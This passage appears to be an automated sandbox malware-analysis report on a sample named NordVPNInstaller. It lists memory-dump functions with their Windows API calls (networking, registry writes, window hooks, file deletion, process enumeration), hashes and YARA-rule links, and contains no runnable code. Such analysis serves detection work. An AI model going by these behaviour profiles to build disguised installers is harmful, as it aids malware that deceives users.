Opcode ID: 5cb4fd7784865fcab72a026384f648ecf961a459411f33ddf50e8e962ab00f91
Instruction ID: ad6648b29a4e7ae7d54a6436800c58e9fe2f738ee617bdb7e8193cb721838188
Opcode Fuzzy Hash: 5cb4fd7784865fcab72a026384f648ecf961a459411f33ddf50e8e962ab00f91
Instruction Fuzzy Hash: 80217C75600600AFEB21DF92CC85FA6B7E8EF08710F08855AED46CBA51D331E548CBA5

Function 05DE14C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE154F

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: 77a8c6030344059864ce33ee7f2570909ef535688d5944a817c8ec1485ff081e
Instruction ID: 76a1379ff149eaec7c9e3b0223b05aa5956ee06e9be1351c4cd75f8dcf7ef761
Opcode Fuzzy Hash: 77a8c6030344059864ce33ee7f2570909ef535688d5944a817c8ec1485ff081e
Instruction Fuzzy Hash: FA21D4B55093846FD7228B11DC45FA6FFB8EF42314F0884DBE9859B553D274A908CBB1

Function 05DE00E2 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE0161

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4fd0491d552a44d68efa052e1bc311ecf07716dd1a246efd67ca330bc6401c50
Instruction ID: a0839b2f47b324cdc60ec96445ad54c506a2c740102f4501b179dcdbdf3cbe08
Opcode Fuzzy Hash: 4fd0491d552a44d68efa052e1bc311ecf07716dd1a246efd67ca330bc6401c50
Instruction Fuzzy Hash: 8821A175405380AFDB22CF51DC48FA7BFB8EF45320F08849AE9859B552C274A508CBB2

Function 05DE21CE Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05DE2252

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: bf34f6dd7db282721a283a9bc8cab5c93294905a958569ff6b685df9de4c7d5a
Instruction ID: d816e87a7eb18588a8e2bd6f1dd1a468ae3e2f4094fc6d7a79dfbb1d2855f45b
Opcode Fuzzy Hash: bf34f6dd7db282721a283a9bc8cab5c93294905a958569ff6b685df9de4c7d5a
Instruction Fuzzy Hash: 25219D754093C09FDB22CF61D884AA2BFF4FF4A310F0984DEE9858B563D275A809DB61

Function 05DE1133 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE11AF

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 6362f73a546dcdaa4fbeb965efe5d8aaeb871806642cdeef849cd84caeb9aace
Instruction ID: 5f2a69096a11ce759e57e06a9e0029b2700da7f81ecbe2a37065c6f28e3dbc8c
Opcode Fuzzy Hash: 6362f73a546dcdaa4fbeb965efe5d8aaeb871806642cdeef849cd84caeb9aace
Instruction Fuzzy Hash: 2C21C3755093846FD722CF51CC84FA6BFB8EF45310F08849BE9449B552C374A508C7B6

Function 05DE50CA Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE513C

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f54ea2e1209e6e7da352a30db5e35a540d4201dcb6c91490ff23f79d26ca0b38
Instruction ID: 93a952e1e715eed7fac90abae390fd5f25e016d102528173505a795bb69e711b
Opcode Fuzzy Hash: f54ea2e1209e6e7da352a30db5e35a540d4201dcb6c91490ff23f79d26ca0b38
Instruction Fuzzy Hash: EF21AE75600200AFEB21DF15DC44FAAB7E8EF15324F08845AED45DB651E370E408CAB1

Function 0104B70E Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 0104B788

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8a6c3b71daa90e74e90f699b98608f0122e7abde26ab4dd8616dff0406de5aaa
Instruction ID: c610e65b72e0d6b4ec5941970f3ff74eba8f8df750fdf1b60010eecb9901a7e1
Opcode Fuzzy Hash: 8a6c3b71daa90e74e90f699b98608f0122e7abde26ab4dd8616dff0406de5aaa
Instruction Fuzzy Hash: 492193B5600204AFE761CF15CD84FA6B7ECEF14714F0884AAE945CBA52D760E548CBB1

Function 05DE09F6 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 05DE0A6A

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 269d70f752c7410da9192d3e370a908d78828a703218fccb9dd694c6944d2bac
Instruction ID: b55000064c5f429722ef93273b9991d9243760e1f86a1e04e09bd0690b23e3dd
Opcode Fuzzy Hash: 269d70f752c7410da9192d3e370a908d78828a703218fccb9dd694c6944d2bac
Instruction Fuzzy Hash: 42210571500204AFE721DF56CD49FA6FBE8EF08324F04845EE9858B641D371E549CBB1

Function 05DE26B2 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE2716

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 55c3a6cac3df3dc3f9666413de45137f7f6a6664d27b909c3ce732c4d0efabaf
Instruction ID: d969a64add8f5898712609ee0a2711d0bfbd0a1d4d9e832464bacfca7d73aeae
Opcode Fuzzy Hash: 55c3a6cac3df3dc3f9666413de45137f7f6a6664d27b909c3ce732c4d0efabaf
Instruction Fuzzy Hash: A711AF796002009FEB20DF15CC84FA6B7ECEF55720F08846AED45CBA51D774E9498AB1

Function 05DE043E Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 05DE04AA

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 02095e03d3570dcd52565285c77301d27995da71834585a36d66e7334c3f3e83
Instruction ID: 0911f14c710bba3ab1f012501e6bb977ed96f16ad8d4690ee1b0239a3fd11505
Opcode Fuzzy Hash: 02095e03d3570dcd52565285c77301d27995da71834585a36d66e7334c3f3e83
Instruction Fuzzy Hash: C221A471500200AFEB21DF55DD45F66FBE4EF08324F04885EE9868A652D375E519CB71

Function 05DE3FD8 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE4046

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: de2c4816a7c6d46a2d08c8a2d9b6981b77b63d6a72bc73c28917426bc7837dd5
Instruction ID: b468ffbe2445e2f78d578b286a295a78efb975e41af86194f5cae211b0d23a7f
Opcode Fuzzy Hash: de2c4816a7c6d46a2d08c8a2d9b6981b77b63d6a72bc73c28917426bc7837dd5
Instruction Fuzzy Hash: C02193755093805FDB51CF65DC85B52BFE8EF45210F0884ABEC45CB652D224E848CB61

Function 05DE15C2 Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 05DE1625

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 03211e713dc4fd41cfd58997640cc6aaaa9364ad513ca26de4fa16980340abd5
Instruction ID: 0abc8f0f21189c6e5a6fbf5399ea92368c5f99ae289172f16521a47134ef07a9
Opcode Fuzzy Hash: 03211e713dc4fd41cfd58997640cc6aaaa9364ad513ca26de4fa16980340abd5
Instruction Fuzzy Hash: D111D075600204AEEB20DB55DD84FBAFBACEF45320F08846AED449B652D374E54DCAB1

Function 0104A73E Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000E24,?,?), ref: 0104A7BD

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 36b34b1a35dec851e53c64a8f55b6bb703b6088847f14b181340ea128cac76db
Instruction ID: dd80581bfd576e6d5ffb7db32a3e740ef65b5c82c9ad6aa0887d4f5a2d563241
Opcode Fuzzy Hash: 36b34b1a35dec851e53c64a8f55b6bb703b6088847f14b181340ea128cac76db
Instruction Fuzzy Hash: 401129715053406FD3118B16DC41F72BFB8EFC6620F05809AEC4897A43D235B919C7B2

Function 05DE63CD Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05DE6449

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 8fc92fc6bc86afa09012c139ca5c9815ea95829e020fbf155dab3701a8763f33
Instruction ID: d2f9da4a5745762600fa0202002e8862c131917d59e008edcb50a2fd34145ba9
Opcode Fuzzy Hash: 8fc92fc6bc86afa09012c139ca5c9815ea95829e020fbf155dab3701a8763f33
Instruction Fuzzy Hash: 572190B55093806FDB228E15DC44B62BFF8FF56710F08808AED858B293D265E808CB72

Function 05DE17C6 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE1830

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: fe75fb3f2c380be7dc2944ff42b362cc7c8b2db7f44278560b8291f3770f1f1c
Instruction ID: dde9988344f380b2189bf4b4d529f354c4aae749144eb710257189979ddbd24b
Opcode Fuzzy Hash: fe75fb3f2c380be7dc2944ff42b362cc7c8b2db7f44278560b8291f3770f1f1c
Instruction Fuzzy Hash: 8611B175500204AEEB21DF92DC84FA6F7ECEF54324F04845BE9459BA41D734E548CBB6

Function 05DE075A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE07CC

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: daf7e896214ed117e771ea733cda1a2567ac413d6aea1a0492e1a39a80a6a68c
Instruction ID: a1b92d51ad37ac9e3c8958c0e1db1f6e5f908a33877f7b1f081c196ac4e7dbe0
Opcode Fuzzy Hash: daf7e896214ed117e771ea733cda1a2567ac413d6aea1a0492e1a39a80a6a68c
Instruction Fuzzy Hash: 39118475500600AFE721EF16CC88FA7F7E8EF14720F08845AE9469B652D760E449CBB1

Function 05DE417E Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE41F0

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 1a40a2e66590d8a2ed236b5937fb3bf0a35f24afbb6c50135cd8fa4dcc7e8762
Instruction ID: f63a23a5fd5cca8b8756a26ef68d47f485c36f446eb471c2d553bc24dcb960ae
Opcode Fuzzy Hash: 1a40a2e66590d8a2ed236b5937fb3bf0a35f24afbb6c50135cd8fa4dcc7e8762
Instruction Fuzzy Hash: D01181B6600200AFEB21DE16DC44FA7BBECEF54724F08845AED459AA52D760E448CAB5

Function 05DE6A3D Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05DE6AB5

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0b7a9a9af56322ca3cd5cb5fc27374787d4edbde41c72b7de132cbb37f778990
Instruction ID: 2f6c71523ac4cc4bfa0f0cb7e6b1f8e65b21d30b763003bf7b8bd73df8d7321b
Opcode Fuzzy Hash: 0b7a9a9af56322ca3cd5cb5fc27374787d4edbde41c72b7de132cbb37f778990
Instruction Fuzzy Hash: 46219D765093C09FDB128B21DC55B62BFB4EF17324F0D84DFE9858B663C265A848CB62

Function 05DE4238 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE42A0

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: f34b330a0e0b6f69e1bb6b439ac0b01009fd817578ed3cadbc68968343454bbe
Instruction ID: 68a894856c06e9036162cadfea1bafc3addcbf4e0cfa6fde80ccbeb1f75d55af
Opcode Fuzzy Hash: f34b330a0e0b6f69e1bb6b439ac0b01009fd817578ed3cadbc68968343454bbe
Instruction Fuzzy Hash: 8A21AF756093809FDB128B25DC55BA6BFB8EF46210F0C84DBED85CF652D275E808CB62

Function 05DE1C98 Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE1D10

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: b7c61b809dec1017acd875a3edab53a73b80946eaa60abb8977ff25df2779c18
Instruction ID: f6891238abf4872e775b50d07474c3c1d1bb376403209316cdb4b2ff462668fe
Opcode Fuzzy Hash: b7c61b809dec1017acd875a3edab53a73b80946eaa60abb8977ff25df2779c18
Instruction Fuzzy Hash: 3411D3755057846FD7228B51CC44FA6FFB8EF46724F08809AE9449B692C268A948CBB2

Function 05DE106A Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE10C9

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 866a3fdc395e57593f78347c10b2c0e3340d1e28b336f7663a585568a163a10b
Instruction ID: 3b532ad4f6f09d190d3d423d2419c3c0630fe0f04ecc3b294919dfb71b327c19
Opcode Fuzzy Hash: 866a3fdc395e57593f78347c10b2c0e3340d1e28b336f7663a585568a163a10b
Instruction Fuzzy Hash: C411E676600200AFEB21DF56DC44FAAF7E8EF44320F08846AED458BA51D374E448CBB1

Function 05DE25CA Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE2626

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 4d31d9f4ba17dee5bfebe243f5ade55dd74c08644684034fc7b834ffa0c4aba1
Instruction ID: 068e1f93380538bb9d435fd0ba16d81f4c1098f6ad3c07b4cfb3454e80c8c5ca
Opcode Fuzzy Hash: 4d31d9f4ba17dee5bfebe243f5ade55dd74c08644684034fc7b834ffa0c4aba1
Instruction Fuzzy Hash: B311E276500200AFEB21DF55DC84FAABBACEF55324F08846AE9458BA51D374E408CBB1

Function 05DE3F1C Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE3F83

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 4c26a536ea6faac3e726d1603478e2536f37e396e637af929ceaf8fb70e3e4b4
Instruction ID: 537d717b7784dfeb637cdbb9fe25a54b0c56ff9d901edcb53021c6e05ea52789
Opcode Fuzzy Hash: 4c26a536ea6faac3e726d1603478e2536f37e396e637af929ceaf8fb70e3e4b4
Instruction Fuzzy Hash: 951172715043809FD711CF65DC84B66BFE8EF46210F0884AFED45CB252D274E808CB61

Function 05DE3A46 Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE3AA2

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: da4a892d826642c9df270f02e3c1e0148e619a494e3e38df925c931059889e20
Instruction ID: ddfe6505b7fc460da85db898a8c9a5c9b19b9dc3878748cd8617bbf04575c99d
Opcode Fuzzy Hash: da4a892d826642c9df270f02e3c1e0148e619a494e3e38df925c931059889e20
Instruction Fuzzy Hash: 2311E275600200AFEB20DF16DC45FBAF7A8EF44324F08886AED458BA41D375E548CBB1

Function 05DE1412 Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE1476

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: b6b75a962b2bffff0c0ba6c1221a755e01d9d3eb7b6ec71b4e53a6a44a0cedfd
Instruction ID: 00ef186d97dae519c5c8651e1560e54af18a1715715f2433017799e596785577
Opcode Fuzzy Hash: b6b75a962b2bffff0c0ba6c1221a755e01d9d3eb7b6ec71b4e53a6a44a0cedfd
Instruction Fuzzy Hash: F01190B6500204AEE721DB51CC84FAAB7ACEF45324F08846BE9459BB41D774E548CBB5

Function 053DBAA9 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053DBACC

Memory Dump Source

Source File: 00000000.00000002.2777847656.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74f6013b2cb46eb74c6ec5c699017733310997dbbffbac60630396fe10314fb6
Instruction ID: 1a9bbbe27ca2d2d4d9c901355ff0c991317db8a168141e30bef70bcb291ae2b6
Opcode Fuzzy Hash: 74f6013b2cb46eb74c6ec5c699017733310997dbbffbac60630396fe10314fb6
Instruction Fuzzy Hash: C7213B7190162ACFCB25DF24D898BAAF7B2BF44305F1184E5D509AB200CB79AE85CF90

Function 05DE2BCA Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05DE2C3E

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6e9792f7edf6464d2e80b9c9ca029803691d3924f52388f401e5e9c775e1c578
Instruction ID: bb2544e1961e1a97c1cb53a619aaf07591179fb109e8314eec8e7645370a451d
Opcode Fuzzy Hash: 6e9792f7edf6464d2e80b9c9ca029803691d3924f52388f401e5e9c775e1c578
Instruction Fuzzy Hash: 5C2193354093809FDB228F61DC44B52FFF4EF46320F0888DEED858B562C275A458CB61

Function 05DE46DE Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE4734

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 70ac50aae6268fca287513b9c31e8e056f367385b5b1a4e8bef2d0b345f795c6
Instruction ID: d9992df2379fbf69a9b1b6a8d7f9cff395efacd9ee89e3ec1b3cfd2584cb6387
Opcode Fuzzy Hash: 70ac50aae6268fca287513b9c31e8e056f367385b5b1a4e8bef2d0b345f795c6
Instruction Fuzzy Hash: 5711E375600200AFEB10DB15DC84BAAB798EF45324F08C46AED45CBA41D774E548CBF5

Function 05DE586C Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 05DE58D7

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: e6e0f4d91d9d3ec52ca9284f60c98e4fcc90db8c0cca91fb62085af5928bc716
Instruction ID: f7c0cf2d5abebd933823ffdecc8944047abe941314b80588bdb8ac3475e61733
Opcode Fuzzy Hash: e6e0f4d91d9d3ec52ca9284f60c98e4fcc90db8c0cca91fb62085af5928bc716
Instruction Fuzzy Hash: 1011D3755083849FD7118F25DC45A66FFB4EF42220F0980DFED858B262C264E808CB72

Function 0104A2AE Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 0104A30C

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 9695a33e8af86e71ff7c69a5e7704f4763bde2181cd1a34602195a9c5cdd195f
Instruction ID: 357212c6f407e24dffa26faffc022e910b4a5bbbaea2a2192d96895c90cfaa60
Opcode Fuzzy Hash: 9695a33e8af86e71ff7c69a5e7704f4763bde2181cd1a34602195a9c5cdd195f
Instruction Fuzzy Hash: 5F114F7550E3C09FD7138B259C94652BFB49F47220F0D80DBED858F1A3D269A808CB72

Function 05DE5D94 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE5DF6

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 259a43952f2fc61aff856d9df701b324d23f79896c45db2a70f10262ee86c04b
Instruction ID: cf216cc50e421ca6a2042ce531ef40989ba9a1623e95767e13bad386f1ae8f59
Opcode Fuzzy Hash: 259a43952f2fc61aff856d9df701b324d23f79896c45db2a70f10262ee86c04b
Instruction Fuzzy Hash: 9B1181755093809FDB21CF65DC84BA6FFE8EF45220F0884AEED45CB662D234E908CB61

Function 05DE0102 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE0161

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: FileRead
String ID:
